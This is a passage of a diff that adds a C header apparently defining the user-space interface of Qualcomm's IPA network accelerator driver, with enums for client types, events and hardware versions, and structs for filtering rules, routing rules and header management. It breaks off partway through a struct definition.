+ /* Below PROD client type is only for test purpose */
+ IPA_CLIENT_TEST_PROD,
+ IPA_CLIENT_TEST1_PROD,
+ IPA_CLIENT_TEST2_PROD,
+ IPA_CLIENT_TEST3_PROD,
+ IPA_CLIENT_TEST4_PROD,
+
+ IPA_CLIENT_CONS,
+ IPA_CLIENT_HSIC1_CONS = IPA_CLIENT_CONS,
+ IPA_CLIENT_WLAN1_CONS,
+ IPA_CLIENT_HSIC2_CONS,
+ IPA_CLIENT_USB2_CONS,
+ IPA_CLIENT_WLAN2_CONS,
+ IPA_CLIENT_HSIC3_CONS,
+ IPA_CLIENT_USB3_CONS,
+ IPA_CLIENT_WLAN3_CONS,
+ IPA_CLIENT_HSIC4_CONS,
+ IPA_CLIENT_USB4_CONS,
+ IPA_CLIENT_WLAN4_CONS,
+ IPA_CLIENT_HSIC5_CONS,
+ IPA_CLIENT_USB_CONS,
+ IPA_CLIENT_USB_DPL_CONS,
+ IPA_CLIENT_A2_EMBEDDED_CONS,
+ IPA_CLIENT_A2_TETHERED_CONS,
+ IPA_CLIENT_A5_LAN_WAN_CONS,
+ IPA_CLIENT_APPS_LAN_CONS,
+ IPA_CLIENT_APPS_WAN_CONS,
+ IPA_CLIENT_ODU_EMB_CONS,
+ IPA_CLIENT_ODU_TETH_CONS,
+ IPA_CLIENT_MHI_CONS,
+ IPA_CLIENT_Q6_LAN_CONS,
+ IPA_CLIENT_Q6_WAN_CONS,
+ IPA_CLIENT_Q6_DUN_CONS,
+ IPA_CLIENT_MEMCPY_DMA_SYNC_CONS,
+ IPA_CLIENT_MEMCPY_DMA_ASYNC_CONS,
+ IPA_CLIENT_Q6_DECOMP_CONS,
+ IPA_CLIENT_Q6_DECOMP2_CONS,
+ IPA_CLIENT_Q6_LTE_WIFI_AGGR_CONS,
+ /* Below CONS client type is only for test purpose */
+ IPA_CLIENT_TEST_CONS,
+ IPA_CLIENT_TEST1_CONS,
+ IPA_CLIENT_TEST2_CONS,
+ IPA_CLIENT_TEST3_CONS,
+ IPA_CLIENT_TEST4_CONS,
+
+ IPA_CLIENT_MAX,
+};
+
+#define IPA_CLIENT_IS_APPS_CONS(client) \
+ ((client) == IPA_CLIENT_APPS_LAN_CONS || \
+ (client) == IPA_CLIENT_APPS_WAN_CONS)
+
+#define IPA_CLIENT_IS_USB_CONS(client) \
+ ((client) == IPA_CLIENT_USB_CONS || \
+ (client) == IPA_CLIENT_USB2_CONS || \
+ (client) == IPA_CLIENT_USB3_CONS || \
+ (client) == IPA_CLIENT_USB_DPL_CONS || \
+ (client) == IPA_CLIENT_USB4_CONS)
+
+#define IPA_CLIENT_IS_WLAN_CONS(client) \
+ ((client) == IPA_CLIENT_WLAN1_CONS || \
+ (client) == IPA_CLIENT_WLAN2_CONS || \
+ (client) == IPA_CLIENT_WLAN3_CONS || \
+ (client) == IPA_CLIENT_WLAN4_CONS)
+
+#define IPA_CLIENT_IS_ODU_CONS(client) \
+ ((client) == IPA_CLIENT_ODU_EMB_CONS || \
+ (client) == IPA_CLIENT_ODU_TETH_CONS)
+
+#define IPA_CLIENT_IS_Q6_CONS(client) \
+ ((client) == IPA_CLIENT_Q6_LAN_CONS || \
+ (client) == IPA_CLIENT_Q6_WAN_CONS || \
+ (client) == IPA_CLIENT_Q6_DUN_CONS || \
+ (client) == IPA_CLIENT_Q6_DECOMP_CONS || \
+ (client) == IPA_CLIENT_Q6_DECOMP2_CONS || \
+ (client) == IPA_CLIENT_Q6_LTE_WIFI_AGGR_CONS)
+
+#define IPA_CLIENT_IS_Q6_PROD(client) \
+ ((client) == IPA_CLIENT_Q6_LAN_PROD || \
+ (client) == IPA_CLIENT_Q6_WAN_PROD || \
+ (client) == IPA_CLIENT_Q6_CMD_PROD || \
+ (client) == IPA_CLIENT_Q6_DECOMP_PROD || \
+ (client) == IPA_CLIENT_Q6_DECOMP2_PROD)
+
+#define IPA_CLIENT_IS_Q6_NON_ZIP_CONS(client) \
+ ((client) == IPA_CLIENT_Q6_LAN_CONS || \
+ (client) == IPA_CLIENT_Q6_WAN_CONS || \
+ (client) == IPA_CLIENT_Q6_DUN_CONS || \
+ (client) == IPA_CLIENT_Q6_LTE_WIFI_AGGR_CONS)
+
+#define IPA_CLIENT_IS_Q6_ZIP_CONS(client) \
+ ((client) == IPA_CLIENT_Q6_DECOMP_CONS || \
+ (client) == IPA_CLIENT_Q6_DECOMP2_CONS)
+
+#define IPA_CLIENT_IS_Q6_NON_ZIP_PROD(client) \
+ ((client) == IPA_CLIENT_Q6_LAN_PROD || \
+ (client) == IPA_CLIENT_Q6_WAN_PROD || \
+ (client) == IPA_CLIENT_Q6_CMD_PROD)
+
+#define IPA_CLIENT_IS_Q6_ZIP_PROD(client) \
+ ((client) == IPA_CLIENT_Q6_DECOMP_PROD || \
+ (client) == IPA_CLIENT_Q6_DECOMP2_PROD)
+
+#define IPA_CLIENT_IS_MEMCPY_DMA_CONS(client) \
+ ((client) == IPA_CLIENT_MEMCPY_DMA_SYNC_CONS || \
+ (client) == IPA_CLIENT_MEMCPY_DMA_ASYNC_CONS)
+
+#define IPA_CLIENT_IS_MEMCPY_DMA_PROD(client) \
+ ((client) == IPA_CLIENT_MEMCPY_DMA_SYNC_PROD || \
+ (client) == IPA_CLIENT_MEMCPY_DMA_ASYNC_PROD)
+
+#define IPA_CLIENT_IS_MHI_CONS(client) \
+ ((client) == IPA_CLIENT_MHI_CONS)
+
+#define IPA_CLIENT_IS_MHI(client) \
+ ((client) == IPA_CLIENT_MHI_CONS || \
+ (client) == IPA_CLIENT_MHI_PROD)
+
+#define IPA_CLIENT_IS_TEST_PROD(client) \
+ ((client) == IPA_CLIENT_TEST_PROD || \
+ (client) == IPA_CLIENT_TEST1_PROD || \
+ (client) == IPA_CLIENT_TEST2_PROD || \
+ (client) == IPA_CLIENT_TEST3_PROD || \
+ (client) == IPA_CLIENT_TEST4_PROD)
+
+#define IPA_CLIENT_IS_TEST_CONS(client) \
+ ((client) == IPA_CLIENT_TEST_CONS || \
+ (client) == IPA_CLIENT_TEST1_CONS || \
+ (client) == IPA_CLIENT_TEST2_CONS || \
+ (client) == IPA_CLIENT_TEST3_CONS || \
+ (client) == IPA_CLIENT_TEST4_CONS)
+
+#define IPA_CLIENT_IS_TEST(client) \
+ (IPA_CLIENT_IS_TEST_PROD(client) || IPA_CLIENT_IS_TEST_CONS(client))
+
+/**
+ * enum ipa_ip_type - Address family: IPv4 or IPv6
+ */
+enum ipa_ip_type {
+ IPA_IP_v4,
+ IPA_IP_v6,
+ IPA_IP_MAX
+};
+
+/**
+ * enum ipa_rule_type - Type of routing or filtering rule
+ * Hashable: Rule will be located at the hashable tables
+ * Non_Hashable: Rule will be located at the non-hashable tables
+ */
+enum ipa_rule_type {
+ IPA_RULE_HASHABLE,
+ IPA_RULE_NON_HASHABLE,
+ IPA_RULE_TYPE_MAX
+};
+
+/**
+ * enum ipa_flt_action - action field of filtering rule
+ *
+ * Pass to routing: 5'd0
+ * Pass to source NAT: 5'd1
+ * Pass to destination NAT: 5'd2
+ * Pass to default output pipe (e.g., Apps or Modem): 5'd3
+ */
+enum ipa_flt_action {
+ IPA_PASS_TO_ROUTING,
+ IPA_PASS_TO_SRC_NAT,
+ IPA_PASS_TO_DST_NAT,
+ IPA_PASS_TO_EXCEPTION
+};
+
+/**
+ * enum ipa_wlan_event - Events for wlan client
+ *
+ * wlan client connect: New wlan client connected
+ * wlan client disconnect: wlan client disconnected
+ * wlan client power save: wlan client moved to power save
+ * wlan client normal: wlan client moved out of power save
+ * sw routing enable: ipa routing is disabled
+ * sw routing disable: ipa routing is enabled
+ * wlan ap connect: wlan AP(access point) is up
+ * wlan ap disconnect: wlan AP(access point) is down
+ * wlan sta connect: wlan STA(station) is up
+ * wlan sta disconnect: wlan STA(station) is down
+ * wlan client connect ex: new wlan client connected
+ * wlan scc switch: wlan interfaces in scc mode
+ * wlan mcc switch: wlan interfaces in mcc mode
+ * wlan wdi enable: wdi data path completed
+ * wlan wdi disable: wdi data path teardown
+ */
+enum ipa_wlan_event {
+ WLAN_CLIENT_CONNECT,
+ WLAN_CLIENT_DISCONNECT,
+ WLAN_CLIENT_POWER_SAVE_MODE,
+ WLAN_CLIENT_NORMAL_MODE,
+ SW_ROUTING_ENABLE,
+ SW_ROUTING_DISABLE,
+ WLAN_AP_CONNECT,
+ WLAN_AP_DISCONNECT,
+ WLAN_STA_CONNECT,
+ WLAN_STA_DISCONNECT,
+ WLAN_CLIENT_CONNECT_EX,
+ WLAN_SWITCH_TO_SCC,
+ WLAN_SWITCH_TO_MCC,
+ WLAN_WDI_ENABLE,
+ WLAN_WDI_DISABLE,
+ IPA_WLAN_EVENT_MAX
+};
+
+/**
+ * enum ipa_wan_event - Events for wan client
+ *
+ * wan default route add/del
+ * wan embms connect: New wan embms interface connected
+ */
+enum ipa_wan_event {
+ WAN_UPSTREAM_ROUTE_ADD = IPA_WLAN_EVENT_MAX,
+ WAN_UPSTREAM_ROUTE_DEL,
+ WAN_EMBMS_CONNECT,
+ WAN_XLAT_CONNECT,
+ IPA_WAN_EVENT_MAX
+};
+
+enum ipa_ecm_event {
+ ECM_CONNECT = IPA_WAN_EVENT_MAX,
+ ECM_DISCONNECT,
+ IPA_ECM_EVENT_MAX,
+};
+
+enum ipa_tethering_stats_event {
+ IPA_TETHERING_STATS_UPDATE_STATS = IPA_ECM_EVENT_MAX,
+ IPA_TETHERING_STATS_UPDATE_NETWORK_STATS,
+ IPA_TETHERING_STATS_EVENT_MAX,
+ IPA_EVENT_MAX_NUM = IPA_TETHERING_STATS_EVENT_MAX
+};
+
+#define IPA_EVENT_MAX ((int)IPA_EVENT_MAX_NUM)
+
+/**
+ * enum ipa_rm_resource_name - IPA RM clients identification names
+ *
+ * Add new mapping to ipa_rm_prod_index() / ipa_rm_cons_index()
+ * when adding new entry to this enum.
+ */
+enum ipa_rm_resource_name {
+ IPA_RM_RESOURCE_PROD = 0,
+ IPA_RM_RESOURCE_Q6_PROD = IPA_RM_RESOURCE_PROD,
+ IPA_RM_RESOURCE_USB_PROD,
+ IPA_RM_RESOURCE_USB_DPL_DUMMY_PROD,
+ IPA_RM_RESOURCE_HSIC_PROD,
+ IPA_RM_RESOURCE_STD_ECM_PROD,
+ IPA_RM_RESOURCE_RNDIS_PROD,
+ IPA_RM_RESOURCE_WWAN_0_PROD,
+ IPA_RM_RESOURCE_WLAN_PROD,
+ IPA_RM_RESOURCE_ODU_ADAPT_PROD,
+ IPA_RM_RESOURCE_MHI_PROD,
+ IPA_RM_RESOURCE_PROD_MAX,
+
+ IPA_RM_RESOURCE_Q6_CONS = IPA_RM_RESOURCE_PROD_MAX,
+ IPA_RM_RESOURCE_USB_CONS,
+ IPA_RM_RESOURCE_USB_DPL_CONS,
+ IPA_RM_RESOURCE_HSIC_CONS,
+ IPA_RM_RESOURCE_WLAN_CONS,
+ IPA_RM_RESOURCE_APPS_CONS,
+ IPA_RM_RESOURCE_ODU_ADAPT_CONS,
+ IPA_RM_RESOURCE_MHI_CONS,
+ IPA_RM_RESOURCE_MAX
+};
+
+/**
+ * enum ipa_hw_type - IPA hardware version type
+ * @IPA_HW_None: IPA hardware version not defined
+ * @IPA_HW_v1_0: IPA hardware version 1.0
+ * @IPA_HW_v1_1: IPA hardware version 1.1
+ * @IPA_HW_v2_0: IPA hardware version 2.0
+ * @IPA_HW_v2_1: IPA hardware version 2.1
+ * @IPA_HW_v2_5: IPA hardware version 2.5
+ * @IPA_HW_v2_6: IPA hardware version 2.6
+ * @IPA_HW_v2_6L: IPA hardware version 2.6L
+ * @IPA_HW_v3_0: IPA hardware version 3.0
+ */
+enum ipa_hw_type {
+ IPA_HW_None = 0,
+ IPA_HW_v1_0 = 1,
+ IPA_HW_v1_1 = 2,
+ IPA_HW_v2_0 = 3,
+ IPA_HW_v2_1 = 4,
+ IPA_HW_v2_5 = 5,
+ IPA_HW_v2_6 = IPA_HW_v2_5,
+ IPA_HW_v2_6L = 6,
+ IPA_HW_v3_0 = 10,
+ IPA_HW_v3_1 = 11,
+ IPA_HW_MAX
+};
+
+/**
+ * struct ipa_rule_attrib - attributes of a routing/filtering
+ * rule, all in LE
+ * @attrib_mask: what attributes are valid
+ * @src_port_lo: low port of src port range
+ * @src_port_hi: high port of src port range
+ * @dst_port_lo: low port of dst port range
+ * @dst_port_hi: high port of dst port range
+ * @type: ICMP/IGMP type
+ * @code: ICMP/IGMP code
+ * @spi: IPSec SPI
+ * @src_port: exact src port
+ * @dst_port: exact dst port
+ * @meta_data: meta-data val
+ * @meta_data_mask: meta-data mask
+ * @u.v4.tos: type of service
+ * @u.v4.protocol: protocol
+ * @u.v4.src_addr: src address value
+ * @u.v4.src_addr_mask: src address mask
+ * @u.v4.dst_addr: dst address value
+ * @u.v4.dst_addr_mask: dst address mask
+ * @u.v6.tc: traffic class
+ * @u.v6.flow_label: flow label
+ * @u.v6.next_hdr: next header
+ * @u.v6.src_addr: src address val
+ * @u.v6.src_addr_mask: src address mask
+ * @u.v6.dst_addr: dst address val
+ * @u.v6.dst_addr_mask: dst address mask
+ */
+struct ipa_rule_attrib {
+ uint32_t attrib_mask;
+ uint16_t src_port_lo;
+ uint16_t src_port_hi;
+ uint16_t dst_port_lo;
+ uint16_t dst_port_hi;
+ uint8_t type;
+ uint8_t code;
+ uint8_t tos_value;
+ uint8_t tos_mask;
+ uint32_t spi;
+ uint16_t src_port;
+ uint16_t dst_port;
+ uint32_t meta_data;
+ uint32_t meta_data_mask;
+ uint8_t src_mac_addr[ETH_ALEN];
+ uint8_t src_mac_addr_mask[ETH_ALEN];
+ uint8_t dst_mac_addr[ETH_ALEN];
+ uint8_t dst_mac_addr_mask[ETH_ALEN];
+ uint16_t ether_type;
+ union {
+ struct {
+ uint8_t tos;
+ uint8_t protocol;
+ uint32_t src_addr;
+ uint32_t src_addr_mask;
+ uint32_t dst_addr;
+ uint32_t dst_addr_mask;
+ } v4;
+ struct {
+ uint8_t tc;
+ uint32_t flow_label;
+ uint8_t next_hdr;
+ uint32_t src_addr[4];
+ uint32_t src_addr_mask[4];
+ uint32_t dst_addr[4];
+ uint32_t dst_addr_mask[4];
+ } v6;
+ } u;
+};
+
+/*! @brief The maximum number of Mask Equal 32 Eqns */
+#define IPA_IPFLTR_NUM_MEQ_32_EQNS 2
+
+/*! @brief The maximum number of IHL offset Mask Equal 32 Eqns */
+#define IPA_IPFLTR_NUM_IHL_MEQ_32_EQNS 2
+
+/*! @brief The maximum number of Mask Equal 128 Eqns */
+#define IPA_IPFLTR_NUM_MEQ_128_EQNS 2
+
+/*! @brief The maximum number of IHL offset Range Check 16 Eqns */
+#define IPA_IPFLTR_NUM_IHL_RANGE_16_EQNS 2
+
+/*! @brief Offset and 16 bit comparison equation */
+struct ipa_ipfltr_eq_16 {
+ int8_t offset;
+ uint16_t value;
+};
+
+/*! @brief Offset and 32 bit comparison equation */
+struct ipa_ipfltr_eq_32 {
+ int8_t offset;
+ uint32_t value;
+};
+
+/*! @brief Offset and 128 bit masked comparison equation */
+struct ipa_ipfltr_mask_eq_128 {
+ int8_t offset;
+ uint8_t mask[16];
+ uint8_t value[16];
+};
+
+/*! @brief Offset and 32 bit masked comparison equation */
+struct ipa_ipfltr_mask_eq_32 {
+ int8_t offset;
+ uint32_t mask;
+ uint32_t value;
+};
+
+/*! @brief Equation for identifying a range. Ranges are inclusive */
+struct ipa_ipfltr_range_eq_16 {
+ int8_t offset;
+ uint16_t range_low;
+ uint16_t range_high;
+};
+
+/*! @brief Rule equations which are set according to DS filter installation */
+struct ipa_ipfltri_rule_eq {
+ /*! 16-bit Bitmask to indicate how many eqs are valid in this rule */
+ uint16_t rule_eq_bitmap;
+ /*! Specifies if a type of service check rule is present */
+ uint8_t tos_eq_present;
+ /*! The value to check against the type of service (ipv4) field */
+ uint8_t tos_eq;
+ /*! Specifies if a protocol check rule is present */
+ uint8_t protocol_eq_present;
+ /*! The value to check against the protocol (ipv6) field */
+ uint8_t protocol_eq;
+ /*! The number of ip header length offset 16 bit range check
+ * rules in this rule */
+ uint8_t num_ihl_offset_range_16;
+ /*! An array of the registered ip header length offset 16 bit
+ * range check rules */
+ struct ipa_ipfltr_range_eq_16
+ ihl_offset_range_16[IPA_IPFLTR_NUM_IHL_RANGE_16_EQNS];
+ /*! The number of mask equal 32 rules present in this rule */
+ uint8_t num_offset_meq_32;
+ /*! An array of all the possible mask equal 32 rules in this rule */
+ struct ipa_ipfltr_mask_eq_32
+ offset_meq_32[IPA_IPFLTR_NUM_MEQ_32_EQNS];
+ /*! Specifies if the traffic class rule is present in this rule */
+ uint8_t tc_eq_present;
+ /*! The value to check the traffic class (ipv4) field against */
+ uint8_t tc_eq;
+ /*! Specifies if the flow equals rule is present in this rule */
+ uint8_t fl_eq_present;
+ /*! The value to check the flow (ipv6) field against */
+ uint32_t fl_eq;
+ /*! The number of ip header length offset 16 bit equations in this
+ * rule */
+ uint8_t ihl_offset_eq_16_present;
+ /*! The ip header length offset 16 bit equation */
+ struct ipa_ipfltr_eq_16 ihl_offset_eq_16;
+ /*! The number of ip header length offset 32 bit equations in this
+ * rule */
+ uint8_t ihl_offset_eq_32_present;
+ /*! The ip header length offset 32 bit equation */
+ struct ipa_ipfltr_eq_32 ihl_offset_eq_32;
+ /*! The number of ip header length offset 32 bit mask equations in
+ * this rule */
+ uint8_t num_ihl_offset_meq_32;
+ /*! The ip header length offset 32 bit mask equation */
+ struct ipa_ipfltr_mask_eq_32
+ ihl_offset_meq_32[IPA_IPFLTR_NUM_IHL_MEQ_32_EQNS];
+ /*! The number of ip header length offset 128 bit equations in this
+ * rule */
+ uint8_t num_offset_meq_128;
+ /*! The ip header length offset 128 bit equation */
+ struct ipa_ipfltr_mask_eq_128
+ offset_meq_128[IPA_IPFLTR_NUM_MEQ_128_EQNS];
+ /*! The metadata 32 bit masked comparison equation present or not */
+ /* Metadata based rules are added internally by IPA driver */
+ uint8_t metadata_meq32_present;
+ /*! The metadata 32 bit masked comparison equation */
+ struct ipa_ipfltr_mask_eq_32 metadata_meq32;
+ /*! Specifies if the Fragment equation is present in this rule */
+ uint8_t ipv4_frag_eq_present;
+};
+
+/**
+ * struct ipa_flt_rule - attributes of a filtering rule
+ * @retain_hdr: bool switch to instruct IPA core to add back to the packet
+ * the header removed as part of header removal
+ * @to_uc: bool switch to pass packet to micro-controller
+ * @action: action field
+ * @rt_tbl_hdl: handle of table from "get"
+ * @attrib: attributes of the rule
+ * @eq_attrib: attributes of the rule in equation form (valid when
+ * eq_attrib_type is true)
+ * @rt_tbl_idx: index of RT table referred to by filter rule (valid when
+ * eq_attrib_type is true and non-exception action)
+ * @eq_attrib_type: true if equation level form used to specify attributes
+ * @max_prio: bool switch. is this rule with Max priority? meaning on rule hit,
+ * IPA will use the rule and will not look for other rules that may have
+ * higher priority
+ * @hashable: bool switch. is this rule hashable or not?
+ * ipa uses hashable rules to cache their hit results to be used in
+ * consecutive packets
+ * @rule_id: rule_id to be assigned to the filter rule. In case client specifies
+ * rule_id as 0 the driver will assign a new rule_id
+ */
+struct ipa_flt_rule {
+ uint8_t retain_hdr;
+ uint8_t to_uc;
+ enum ipa_flt_action action;
+ uint32_t rt_tbl_hdl;
+ struct ipa_rule_attrib attrib;
+ struct ipa_ipfltri_rule_eq eq_attrib;
+ uint32_t rt_tbl_idx;
+ uint8_t eq_attrib_type;
+ uint8_t max_prio;
+ uint8_t hashable;
+ uint16_t rule_id;
+};
+
+/**
+ * enum ipa_hdr_l2_type - L2 header type
+ * IPA_HDR_L2_NONE: L2 header which isn't Ethernet II and isn't 802_3
+ * IPA_HDR_L2_ETHERNET_II: L2 header of type Ethernet II
+ * IPA_HDR_L2_802_3: L2 header of type 802_3
+ */
+enum ipa_hdr_l2_type {
+ IPA_HDR_L2_NONE,
+ IPA_HDR_L2_ETHERNET_II,
+ IPA_HDR_L2_802_3,
+ IPA_HDR_L2_MAX,
+};
+
+/**
+ * enum ipa_hdr_l2_type - Processing context type
+ * IPA_HDR_PROC_NONE: No processing context
+ * IPA_HDR_PROC_ETHII_TO_ETHII: Process Ethernet II to Ethernet II
+ * IPA_HDR_PROC_ETHII_TO_802_3: Process Ethernet II to 802_3
+ * IPA_HDR_PROC_802_3_TO_ETHII: Process 802_3 to Ethernet II
+ * IPA_HDR_PROC_802_3_TO_802_3: Process 802_3 to 802_3
+ */
+enum ipa_hdr_proc_type {
+ IPA_HDR_PROC_NONE,
+ IPA_HDR_PROC_ETHII_TO_ETHII,
+ IPA_HDR_PROC_ETHII_TO_802_3,
+ IPA_HDR_PROC_802_3_TO_ETHII,
+ IPA_HDR_PROC_802_3_TO_802_3,
+ IPA_HDR_PROC_MAX,
+};
+
+/**
+ * struct ipa_rt_rule - attributes of a routing rule
+ * @dst: dst "client"
+ * @hdr_hdl: handle to the dynamic header
+ it is not an index or an offset
+ * @hdr_proc_ctx_hdl: handle to header processing context. if it is provided
+ hdr_hdl shall be 0
+ * @attrib: attributes of the rule
+ * @max_prio: bool switch. is this rule with Max priority? meaning on rule hit,
+ * IPA will use the rule and will not look for other rules that may have
+ * higher priority
+ * @hashable: bool switch. is this rule hashable or not?
+ * ipa uses hashable rules to cache their hit results to be used in
+ * consecutive packets
+ * @retain_hdr: bool switch to instruct IPA core to add back to the packet
+ * the header removed as part of header removal
+ */
+struct ipa_rt_rule {
+ enum ipa_client_type dst;
+ uint32_t hdr_hdl;
+ uint32_t hdr_proc_ctx_hdl;
+ struct ipa_rule_attrib attrib;
+ uint8_t max_prio;
+ uint8_t hashable;
+ uint8_t retain_hdr;
+};
+
+/**
+ * struct ipa_hdr_add - header descriptor includes in and out
+ * parameters
+ * @name: name of the header
+ * @hdr: actual header to be inserted
+ * @hdr_len: size of above header
+ * @type: l2 header type
+ * @is_partial: header not fully specified
+ * @hdr_hdl: out parameter, handle to header, valid when status is 0
+ * @status: out parameter, status of header add operation,
+ * 0 for success,
+ * -1 for failure
+ * @is_eth2_ofst_valid: is eth2_ofst field valid?
+ * @eth2_ofst: offset to start of Ethernet-II/802.3 header
+ */
+struct ipa_hdr_add {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint8_t hdr[IPA_HDR_MAX_SIZE];
+ uint8_t hdr_len;
+ enum ipa_hdr_l2_type type;
+ uint8_t is_partial;
+ uint32_t hdr_hdl;
+ int status;
+ uint8_t is_eth2_ofst_valid;
+ uint16_t eth2_ofst;
+};
+
+/**
+ * struct ipa_ioc_add_hdr - header addition parameters (support
+ * multiple headers and commit)
+ * @commit: should headers be written to IPA HW also?
+ * @num_hdrs: num of headers that follow
+ * @ipa_hdr_add hdr: all headers need to go here back to
+ * back, no pointers
+ */
+struct ipa_ioc_add_hdr {
+ uint8_t commit;
+ uint8_t num_hdrs;
+ struct ipa_hdr_add hdr[0];
+};
+
+/**
+ * struct ipa_hdr_proc_ctx_add - processing context descriptor includes
+ * in and out parameters
+ * @type: processing context type
+ * @hdr_hdl: in parameter, handle to header
+ * @proc_ctx_hdl: out parameter, handle to proc_ctx, valid when status is 0
+ * @status: out parameter, status of header add operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_hdr_proc_ctx_add {
+ enum ipa_hdr_proc_type type;
+ uint32_t hdr_hdl;
+ uint32_t proc_ctx_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_add_hdr - processing context addition parameters (support
+ * multiple processing context and commit)
+ * @commit: should processing context be written to IPA HW also?
+ * @num_proc_ctxs: num of processing context that follow
+ * @proc_ctx: all processing context need to go here back to
+ * back, no pointers
+ */
+struct ipa_ioc_add_hdr_proc_ctx {
+ uint8_t commit;
+ uint8_t num_proc_ctxs;
+ struct ipa_hdr_proc_ctx_add proc_ctx[0];
+};
+
+/**
+ * struct ipa_ioc_copy_hdr - retrieve a copy of the specified
+ * header - caller can then derive the complete header
+ * @name: name of the header resource
+ * @hdr: out parameter, contents of specified header,
+ * valid only when ioctl return val is non-negative
+ * @hdr_len: out parameter, size of above header
+ * valid only when ioctl return val is non-negative
+ * @type: l2 header type
+ * valid only when ioctl return val is non-negative
+ * @is_partial: out parameter, indicates whether specified header is partial
+ * valid only when ioctl return val is non-negative
+ * @is_eth2_ofst_valid: is eth2_ofst field valid?
+ * @eth2_ofst: offset to start of Ethernet-II/802.3 header
+ */
+struct ipa_ioc_copy_hdr {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint8_t hdr[IPA_HDR_MAX_SIZE];
+ uint8_t hdr_len;
+ enum ipa_hdr_l2_type type;
+ uint8_t is_partial;
+ uint8_t is_eth2_ofst_valid;
+ uint16_t eth2_ofst;
+};
+
+/**
+ * struct ipa_ioc_get_hdr - header entry lookup parameters, if lookup was
+ * successful caller must call put to release the reference count when done
+ * @name: name of the header resource
+ * @hdl: out parameter, handle of header entry
+ * valid only when ioctl return val is non-negative
+ */
+struct ipa_ioc_get_hdr {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t hdl;
+};
+
+/**
+ * struct ipa_hdr_del - header descriptor includes in and out
+ * parameters
+ *
+ * @hdl: handle returned from header add operation
+ * @status: out parameter, status of header remove operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_hdr_del {
+ uint32_t hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_del_hdr - header deletion parameters (support
+ * multiple headers and commit)
+ * @commit: should headers be removed from IPA HW also?
+ * @num_hdls: num of headers being removed
+ * @ipa_hdr_del hdl: all handles need to go here back to back, no pointers
+ */
+struct ipa_ioc_del_hdr {
+ uint8_t commit;
+ uint8_t num_hdls;
+ struct ipa_hdr_del hdl[0];
+};
+
+/**
+ * struct ipa_hdr_proc_ctx_del - processing context descriptor includes
+ * in and out parameters
+ * @hdl: handle returned from processing context add operation
+ * @status: out parameter, status of header remove operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_hdr_proc_ctx_del {
+ uint32_t hdl;
+ int status;
+};
+
+/**
+ * ipa_ioc_del_hdr_proc_ctx - processing context deletion parameters (support
+ * multiple headers and commit)
+ * @commit: should processing contexts be removed from IPA HW also?
+ * @num_hdls: num of processing contexts being removed
+ * @ipa_hdr_proc_ctx_del hdl: all handles need to go here back to back,
+ * no pointers
+ */
+struct ipa_ioc_del_hdr_proc_ctx {
+ uint8_t commit;
+ uint8_t num_hdls;
+ struct ipa_hdr_proc_ctx_del hdl[0];
+};
+
+/**
+ * struct ipa_rt_rule_add - routing rule descriptor includes in
+ * and out parameters
+ * @rule: actual rule to be added
+ * @at_rear: add at back of routing table, it is NOT possible to add rules at
+ * the rear of the "default" routing tables
+ * @rt_rule_hdl: output parameter, handle to rule, valid when status is 0
+ * @status: output parameter, status of routing rule add operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_rt_rule_add {
+ struct ipa_rt_rule rule;
+ uint8_t at_rear;
+ uint32_t rt_rule_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_add_rt_rule - routing rule addition parameters (supports
+ * multiple rules and commit);
+ *
+ * all rules MUST be added to same table
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @rt_tbl_name: name of routing table resource
+ * @num_rules: number of routing rules that follow
+ * @ipa_rt_rule_add rules: all rules need to go back to back here, no pointers
+ */
+struct ipa_ioc_add_rt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ char rt_tbl_name[IPA_RESOURCE_NAME_MAX];
+ uint8_t num_rules;
+ struct ipa_rt_rule_add rules[0];
+};
+
+/**
+ * struct ipa_ioc_add_rt_rule_after - routing rule addition after a specific
+ * rule parameters(supports multiple rules and commit);
+ *
+ * all rules MUST be added to same table
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @rt_tbl_name: name of routing table resource
+ * @num_rules: number of routing rules that follow
+ * @add_after_hdl: the rules will be added after this specific rule
+ * @ipa_rt_rule_add rules: all rules need to go back to back here, no pointers
+ * at_rear field will be ignored when using this IOCTL
+ */
+struct ipa_ioc_add_rt_rule_after {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ char rt_tbl_name[IPA_RESOURCE_NAME_MAX];
+ uint8_t num_rules;
+ uint32_t add_after_hdl;
+ struct ipa_rt_rule_add rules[0];
+};
+
+/**
+ * struct ipa_rt_rule_mdfy - routing rule descriptor includes
+ * in and out parameters
+ * @rule: actual rule to be added
+ * @rt_rule_hdl: handle to rule which supposed to modify
+ * @status: output parameter, status of routing rule modify operation,
+ * 0 for success,
+ * -1 for failure
+ *
+ */
+struct ipa_rt_rule_mdfy {
+ struct ipa_rt_rule rule;
+ uint32_t rt_rule_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_mdfy_rt_rule - routing rule modify parameters (supports
+ * multiple rules and commit)
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @num_rules: number of routing rules that follow
+ * @rules: all rules need to go back to back here, no pointers
+ */
+struct ipa_ioc_mdfy_rt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ uint8_t num_rules;
+ struct ipa_rt_rule_mdfy rules[0];
+};
+
+/**
+ * struct ipa_rt_rule_del - routing rule descriptor includes in
+ * and out parameters
+ * @hdl: handle returned from route rule add operation
+ * @status: output parameter, status of route rule delete operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_rt_rule_del {
+ uint32_t hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_del_rt_rule - routing rule deletion parameters (supports
+ * multiple headers and commit)
+ * @commit: should rules be removed from IPA HW also?
+ * @ip: IP family of rules
+ * @num_hdls: num of rules being removed
+ * @ipa_rt_rule_del hdl: all handles need to go back to back here, no pointers
+ */
+struct ipa_ioc_del_rt_rule {
+ uint8_t commit;
